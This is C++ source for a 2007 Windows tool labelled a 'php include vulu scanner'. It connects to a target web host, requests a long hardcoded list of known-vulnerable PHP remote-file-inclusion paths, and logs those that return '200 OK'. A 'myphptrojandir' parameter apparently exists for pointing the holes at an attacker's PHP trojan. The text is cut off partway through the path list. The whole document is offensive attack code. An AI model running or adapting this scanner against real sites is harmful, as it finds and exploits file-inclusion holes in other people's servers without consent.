php include scan

/* php include vulu scanner,code by horse_b 2007-06-05 */ #include "stdafx.h" #include "getopt.h" #include "windns.h" #include <winsock.h> struct cgiurl{ char *rmt_host; char *rmt_wwwhost; char *url; int n; int rmt_port; int vebose; }; int countvulscan = 0; int findok = 0; void SaveLog(char* c) { CTime tm=CTime::GetCurrentTime(); CString name = "log.s"; CFile file; if(!file.Open(name,CFile::modeReadWrite)) { file.Open(name,CFile::modeCreate|CFile::modeReadWrite); } file.SeekToEnd(); UINT nLen = strlen(c); file.Write(c,nLen); file.Write("\r\n",2); file.Close(); } UINT GetPhpInc(LPVOID pParam) { char holetmp[4096] = "\0"; char rbuff[1024]; struct cgiurl* tcgi=(struct cgiurl *)pParam; char *hole=tcgi->url; int port = tcgi->rmt_port; int vebose = tcgi->vebose; countvulscan++; struct timeval tv; tv.tv_sec = 10; tv.tv_usec = 0; //"GET %s HTTP/1.0\r\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* \r\nAccept-Language: zh-cn\r\nAccept-Encoding: gzip, deflate\r\nIf-Modified-Since: Sun, 26 Jun 2005 15:43:05 GMT\r\nIf-None-Match: \"60794-12b3-e4169440\"\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322; .NET CLR 1.0.3705)\r\nHost: %s\r\n\r\n",argv[2],argv[1] char *rmt_host=tcgi->rmt_host; char *rmt_wwwhost=tcgi->rmt_wwwhost; CString url="GET "; url+=hole; url+="\r\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* \r\n"; url+="Referer: "; url+=rmt_wwwhost; url+="\r\n"; url+="Accept-Language: zh-cn\r\nAccept-Encoding: gzip, deflate\r\nIf-Modified-Since: Sun, 26 Jun 2005 15:43:05 GMT\r\nIf-None-Match: \"60794-12b3-e4169440\"\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322; .NET CLR 1.0.3705)\r\n"; url+="Host: "; url+=rmt_host; url+="\r\n\r\n"; int num=tcgi->n; SOCKET sockfd; SOCKADDR_IN addr; sockfd = socket(AF_INET, SOCK_STREAM, 0); if (sockfd < 0) { exit(0); } addr.sin_family = AF_INET; addr.sin_port = htons(port); addr.sin_addr.s_addr = inet_addr(rmt_host); int r = connect(sockfd,(struct sockaddr *) &addr, sizeof(addr)); send(sockfd,url,url.GetLength(),0); memset(rbuff,0,1024); int e; fd_set rd; int n = 0; FD_ZERO(&rd); FD_SET(sockfd, &rd); for(;;) { tv.tv_sec = 10; tv.tv_usec = 0; e = select(sockfd + 1, &rd, NULL, NULL, &tv); if(e < 0 )continue; else break; } if(e > 0 && FD_ISSET(sockfd, &rd) != 0) { n = recv(sockfd,rbuff,sizeof(rbuff),0); if(n <= 0) return 0; } //printf("---------------------->recv size(buff) = %d\n",n); CString display="\tfind"; display+=hole; display+="------->>>>>> hole ok\r\n"; if (strstr(rbuff,"200 OK")!=NULL) { sprintf(holetmp,"%s\n",display); SaveLog(holetmp); printf(holetmp); findok++; } closesocket(sockfd); return 0; } int StartScan(char *rmt_host,char *rmt_wwwhost,int rmt_host_port,char* myphptrojandir,int vebose) { char rbuff[1024]; char holetmp[4096] = "\0"; char* phpurl[430]; phpurl[0]="cgi-bin/gadgets/Blog/BlogModel.php?path="; phpurl[1]="includes/header.php?systempath="; phpurl[2]="Gallery/displayCategory.php?basepath="; phpurl[3]="index.inc.php?PATH_Includes="; phpurl[4]="nphp/nphpd.php?nphp_config[LangFile]="; phpurl[5]="include/db.php?GLOBALS[rootdp]="; phpurl[6]="ashnews.php?pathtoashnews="; phpurl[7]="ashheadlines.php?pathtoashnews="; phpurl[8]="modules/xgallery/upgrade_album.php?GALLERY_BASEDIR="; phpurl[9]="demo/includes/init.php?user_inc="; phpurl[10]="jaf/index.php?show="; phpurl[11]="inc/shows.inc.php?cutepath="; phpurl[12]="poll/admin/common.inc.php?base_path="; phpurl[13]="pollvote/pollvote.php?pollname="; phpurl[14]="sources/post.php?fil_config="; phpurl[15]="modules/My_eGallery/public/displayCategory.php?basepath="; phpurl[16]="bb_lib/checkdb.inc.php?libpach="; phpurl[17]="include/livre_include.php?no_connect=lol&chem_absolu="; phpurl[18]="index.php?from_market=Y&pageurl="; phpurl[19]="modules/mod_mainmenu.php?mosConfig_absolute_path="; phpurl[20]="pivot/modules/module_db.php?pivot_path="; phpurl[21]="modules/4nAlbum/public/displayCategory.php?basepath="; phpurl[22]="derniers_commentaires.php?rep="; phpurl[23]="modules/coppermine/themes/default/theme.php?THEME_DIR="; phpurl[24]="modules/coppermine/include/init.inc.php?CPG_M_DIR="; phpurl[25]="modules/coppermine/themes/coppercop/theme.php?THEME_DIR="; phpurl[26]="coppermine/themes/maze/theme.php?THEME_DIR="; phpurl[28]="allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]="; phpurl[29]="allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]="; phpurl[30]="myPHPCalendar/admin.php?cal_dir="; phpurl[31]="agendax/addevent.inc.php?agendax_path="; phpurl[32]="modules/mod_mainmenu.php?mosConfig_absolute_path="; phpurl[33]="modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path="; phpurl[34]="main.php?page="; phpurl[35]="default.php?page="; phpurl[36]="index.php?action="; phpurl[37]="index1.php?p="; phpurl[38]="index2.php?x="; phpurl[39]="index2.php?content="; phpurl[40]="index.php?conteudo="; phpurl[41]="index.php?cat="; phpurl[42]="include/new-visitor.inc.php?lvc_include_dir="; phpurl[43]="modules/agendax/addevent.inc.php?agendax_path="; phpurl[44]="shoutbox/expanded.php?conf="; phpurl[45]="modules/xgallery/upgrade_album.php?GALLERY_BASEDIR="; phpurl[46]="pivot/modules/module_db.php?pivot_path="; phpurl[47]="library/editor/editor.php?root="; phpurl[48]="library/lib.php?root="; phpurl[49]="e107/e107_handlers/secure_img_render.php?p="; phpurl[50]="zentrack/index.php?configFile="; phpurl[51]="main.php?x="; phpurl[52]="becommunity/community/index.php?pageurl="; phpurl[53]="GradeMap/index.php?page="; phpurl[54]="phpopenchat/contrib/yabbse/poc.php?sourcedir="; phpurl[55]="calendar/calendar.php?serverPath="; phpurl[56]="calendar/functions/popup.php?serverPath="; phpurl[57]="calendar/events/header.inc.php?serverPath="; phpurl[58]="calendar/events/datePicker.php?serverPath="; phpurl[59]="calendar/setup/setupSQL.php?serverPath="; phpurl[60]="calendar/setup/header.inc.php?serverPath="; phpurl[61]="mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]="; phpurl[62]="zentrack/index.php?configFile="; phpurl[63]="pivot/modules/module_db.php?pivot_path="; phpurl[64]="inc/header.php/step_one.php?server_inc="; phpurl[65]="install/index.php?lng=../../include/main.inc&G_PATH="; phpurl[66]="inc/pipe.php?HCL_path="; phpurl[67]="include/write.php?dir="; phpurl[68]="include/new-visitor.inc.php?lvc_include_dir="; phpurl[69]="includes/header.php?systempath="; phpurl[70]="support/mailling/maillist/inc/initdb.php?absolute_path="; phpurl[71]="coppercop/theme.php?THEME_DIR="; phpurl[72]="zentrack/index.php?configFile="; phpurl[73]="pivot/modules/module_db.php?pivot_path="; phpurl[74]="inc/header.php/step_one.php?server_inc="; phpurl[75]="install/index.php?lng=../../include/main.inc&G_PATH="; phpurl[76]="inc/pipe.php?HCL_path="; phpurl[77]="include/write.php?dir="; phpurl[78]="include/new-visitor.inc.php?lvc_include_dir="; phpurl[79]="includes/header.php?systempath="; phpurl[80]="support/mailling/maillist/inc/initdb.php?absolute_path="; phpurl[81]="coppercop/theme.php?THEME_DIR="; phpurl[82]="becommunity/community/index.php?pageurl="; phpurl[83]="shoutbox/expanded.php?conf="; phpurl[84]="agendax/addevent.inc.php?agendax_path="; phpurl[85]="myPHPCalendar/admin.php?cal_dir="; phpurl[86]="yabbse/Sources/Packages.php?sourcedir="; phpurl[87